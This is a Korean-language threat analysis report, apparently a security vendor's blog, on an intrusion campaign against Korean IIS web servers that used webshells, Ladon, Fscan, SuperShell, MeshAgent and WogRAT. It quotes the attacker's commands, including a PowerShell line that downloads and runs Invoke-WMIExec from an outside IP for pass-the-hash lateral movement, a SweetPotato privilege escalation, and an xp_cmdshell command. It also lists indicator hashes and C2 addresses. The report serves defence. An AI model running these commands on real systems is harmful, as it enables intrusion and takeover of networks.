MeshAgent와 SuperShell을 악용한 국내 웹 서버 대상 공격 사례

최근 국내 웹 서버들을 대상으로 MeshAgent와 SuperShell을 악용한 공격 사례들이 확인되고 있다. 악성코드 배포 주소에 ELF 포맷의 악성코드들이 함께 존재하는 것을 보면 공격자는 윈도우 서버뿐만 아니라 리눅스 서버도 공격 중인 것으로 보인다. 공격자는 파일 업로드 취약점을 이용해 웹쉘을 설치한 것으로 추정되며 이를 이용해 추가 페이로드를 설치하였는데 탐색 및 측면 이동 공격을 통해 감염 시스템뿐만 아니라 조직의 다른 시스템 또한 공격을 시도하였다.

공격에 사용된 악성코드 배포 주소에서는 WogRAT이 함께 확인되었는데 WogRAT은 Rekoobe와 유사하게 오픈 소스 악성코드인 “Tiny SHell”의 루틴을 차용해 개발된 백도어 악성코드이다. 최근 확인된 WogRAT의 C&C 서버 주소가 과거 aNotepad를 악용해 유포되었던 공격 사례의 WogRAT과 C&C 서버 주소가 동일한 점을 보면 두 사례 모두 동일한 공격자의 소행으로 추정된다.

공격에 사용된 웹쉘을 포함해 대부분의 악성코드들은 공개된 도구들이기 때문에 사용된 도구들 기준으로는 두 사례의 연관성 외에 공격자에 대한 정확한 정보는 알 수 없다. 물론 Ladon이나 Fscan, MeshAgent, SuperShell 등의 악성코드들이 과거부터 중국어를 사용하는 공격자들이 자주 사용하고 있는 도구들인 점은 특징이다. 

Figure 1. 흐름도

 

1. Initial Access

초기 침투 방식에 대해서는 알 수 없지만 다음과 같은 경로들에 웹쉘이 설치된 것을 보면 웹 서버의 파일 업로드 취약점을 악용한 것으로 추정된다. 공격자는 설치된 웹쉘을 이용해 탐색 명령들을 실행한 후 추가 페이로드를 설치하였다.

D:\WEB\*******\******\Data\Editor\File\g.asp D:\WEB\*******\******\Data\Editor\File\test6\aa.asp D:\WEB\*******\******\Data\Editor\File\test6\ab.asp D:\WEB\*******\******\Data\Editor\File\test9\1.aspx D:\WEB\*******\******\Data\Editor\File\test9\1.aspx D:\WEB\*******\******\Data\Editor\File\test9\tunnel1.aspx

 

2. Persistence

공격자는 초기 침투 과정에서 웹쉘을 설치하여 감염 시스템을 제어하였을 뿐만 아니라 이후에도 명령을 실행하기 위한 지속성 유지 목적으로 웹쉘을 활용하였다. 윈도우 IIS 웹 서버가 공격 대상임에 따라 사용된 웹쉘들은 모두 ASP, ASPX 포맷의 웹쉘들이다. 공격 로그에서는 Chopper, Godzilla, Regeorg 등 다양한 웹쉘들의 로그가 존재한다.

Figure 2. 공격에 사용된 웹쉘들

 

3. Discovery

공격자는 웹쉘을 설치한 이후 다음과 같은 명령들을 이용해 감염 시스템에 대한 정보를 수집하였다.

> ipconfig > whoami > whoami  /all > systeminfo > netstat  -ano > query  user > tasklist /svc > ping  -nc 1 [IP 주소]

이후 Fscan을 이용해 감염 시스템이 포함된 네트워크를 스캐닝하였다.

> fscan.exe  -hf i.txt -nocolor -silent -o rr8.txt > fscan.exe  -hf a.txt -nocolor -silent -p 445,135,22 -o rr6.txt

Figure 3. 중국어로 개발된 Fscan 도구

 

4. Privilege Escalation

권한 상승 과정에서는 Ladon이 악용되었는데 Ladon 또한 중국어를 사용하는 공격자들이 주로 사용하는 도구이다. 공격 과정에서 필요한 다양한 기능들을 지원하기 때문에 공격자는 공격 대상 시스템을 장악한 이후 Ladon을 이용해 스캐닝, 권한 상승, 계정 정보 탈취와 같은 다양한 악성 행위를 수행할 수 있다. 실행 파일 포맷의 Ladon 외에도 파워쉘로 제작된 PowerLadon도 존재하는데 해당 공격 사례에서는 PowerLadon이 사용되었다.

공격자들은 웹쉘을 통해 감염 시스템에서 명령을 실행할 수 있다고 하더라도 w3wp.exe 프로세스가 적절한 권한이 존재하지 않기 때문에 원하는 악성 행위를 수행할 수 없다. 이러한 문제를 해결하기 위해 공격자들은 공격 과정에서 권한 상승 악성코드들을 함께 사용하는 경향이 있으며 주로 Potato 유형의 악성코드들을 사용한다. 이번 공격 사례에서는 Ladon이 지원하는 SweetPotato 명령으로 권한을 상승시켰다.

> powershell  -exec bypass Import-Module .\Ladon.ps1;Ladon SweetPotato whoami

 

5. Command and Control

공격자는 웹쉘뿐만 아니라 SuperShell과 MeshAgent를 설치해 감염 시스템을 제어하였으며 프록시 도구를 설치하기도 하였다. SuperShell은 Go 언어로 개발되어 윈도우와 리눅스, 안드로이드를 포함한 다양한 플랫폼을 지원한다. 실질적인 기능은 리버스 쉘이며 공격자는 이를 이용해 감염 시스템을 원격에서 제어할 수 있다. SuperShell은 부적절하게 관리되는 리눅스 서버 대상 공격 사례에서도 악용되었으며 UNC5174와 같은 APT 공격자들이 사용한 사례도 알려져 있다. [1] [2]

Figure 4. 깃허브의 SuperShell 저장소

MeshAgent는 원격 관리에 필요한 시스템의 기본 정보들을 수집하고 전원 및 계정 제어, 채팅이나 메시지 팝업, 파일 업로드/다운로드 그리고 명령 실행과 같은 기능들을 제공한다. 이외에도 원격 데스크톱을 지원하는데, 특히 RDP 및 VNC와 같은 원격 데스크톱 기능들 또한 웹 기반으로 지원이 된다. 일반적인 사용자들은 원격에서 시스템을 관리하기 위해 이를 이용할 것이지만 이러한 기능들 때문에 악의적인 목적으로 사용될 수 있다.

Figure 5. MeshAgent의 설정 파일 및 C&C 주소

참고로 공격자가 악성코드를 다운로드한 주소에서는 리눅스 서버 대상 악성코드들이 함께 존재한다. SuperShell의 경우 PE 포맷뿐만 아니라 ELF 포맷의 악성코드가 함께 업로드되어 있었으며 WogRAT이 확인되기도 하였다. WogRAT은 과거 무료 온라인 메모장 플랫폼인 aNotepad를 악용해 유포되었던 악성코드로서 공격자가 제작 시 사용한 “WingsOfGod” 문자열이 특징이다. WogRAT은 윈도우뿐만 아니라 리눅스 버전도 존재하는데 리눅스 버전은 Rekoobe와 유사하게 오픈 소스 악성코드인 “Tiny SHell”의 루틴을 차용해 개발되었다. WogRAT에 대한 상세한 분석 정보는 기존 블로그에 정리되어 있다. [3]

WogRAT의 C&C 서버 주소가 과거 사례와 동일한 도메인인 것을 보면 두 개의 공격 사례 모두 동일한 공격자의 소행으로 추정된다. 기존 사례에서는 윈도우 시스템 기준 정상 유틸리티를 위장한 이름으로 유포되었지만 이번에 확인된 사례에서는 취약한 웹 서버를 공격한 것이 차이점이다.

 

6. Credential Access

감염 시스템뿐만 아니라 감염 시스템이 속한 네트워크를 장악하기 위한 측면 이동 단계를 위해서는 자격 증명 정보를 수집할 필요가 있다. 실제로 WMIExec과 Ladon을 이용한 측면 이동 단계가 확인된 것을 보면 자격 증명 정보 탈취에 성공한 것으로 보인다. 공격자는 다양한 방식을 사용했을 것으로 보이지만 확인된 도구로는 Network Password Dump가 존재한다. 해당 도구는 시스템에 저장된 네트워크 인증 정보를 수집해 보여주는 기능을 담당한다.

Figure 6. Network Password Dump 도구

 

7. Lateral Movement

공격자는 관리자 계정의 NT Hash를 얻는데 성공하였으며 이를 기반으로 WMIExec을 활용해 조직의 다른 시스템으로 측면 이동하였다.

> IEX (New-Object Net.WebClient).DownloadString(‘hxxp://139.180.142[.]127/Invoke-WMIExec.ps1’);Invoke-WMIExec -Target [IP] -Domain [Domain] -Username Administrator -Hash [Hash] -Command ‘whoami’ -verbose”

이외에도 MS-SQL 서버 또한 공격 대상이 되었는데 다음과 같이 Ladon을 활용한 측면 이동 공격 명령을 확인할 수 있었다.

> powershell  -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon Runas [User] [Password] whoami > powershell  -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon MssqlCmd [IP] [User] [Password] master xp_cmdshell “net user”

 

8. 결론

최근 국내 IIS 웹 서버를 대상으로 발생한 공격 중 WogRAT 공격자와 동일한 공격자의 소행으로 추정되는 사례가 확인되었다. 공격자는 윈도우뿐만 아니라 리눅스 또한 공격 대상으로 하는 것으로 보이며 초기 침투 단계부터 시작해 측면 이동 단계까지 진행하여 감염 시스템이 속한 네트워크를 장악하려고 시도하였다. 최종적인 목적은 알 수 없지만 조직의 네트워크 장악에 성공할 경우 민감한 정보를 탈취하거나 랜섬웨어를 감염시킬 수 있다.

 

MD5

06ebef1f7cc6fb21f8266f8c9f9ae2d9

3f6211234c0889142414f7b579d43c38

460953e5f7d1e490207d37f95c4f430a

4c8ccdc6f1838489ed2ebeb4978220cb

5c835258fc39104f198bca243e730d57

URL

http[:]//139[.]180[.]142[.]127/Invoke-WMIExec[.]ps1

http[:]//45[.]76[.]219[.]39/bb

http[:]//45[.]76[.]219[.]39/mc[.]exe

http[:]//66[.]42[.]113[.]183/acccc

http[:]//66[.]42[.]113[.]183/kblockd

FQDN

linuxwork[.]net

IP

108[.]61[.]247[.]121

66[.]42[.]113[.]183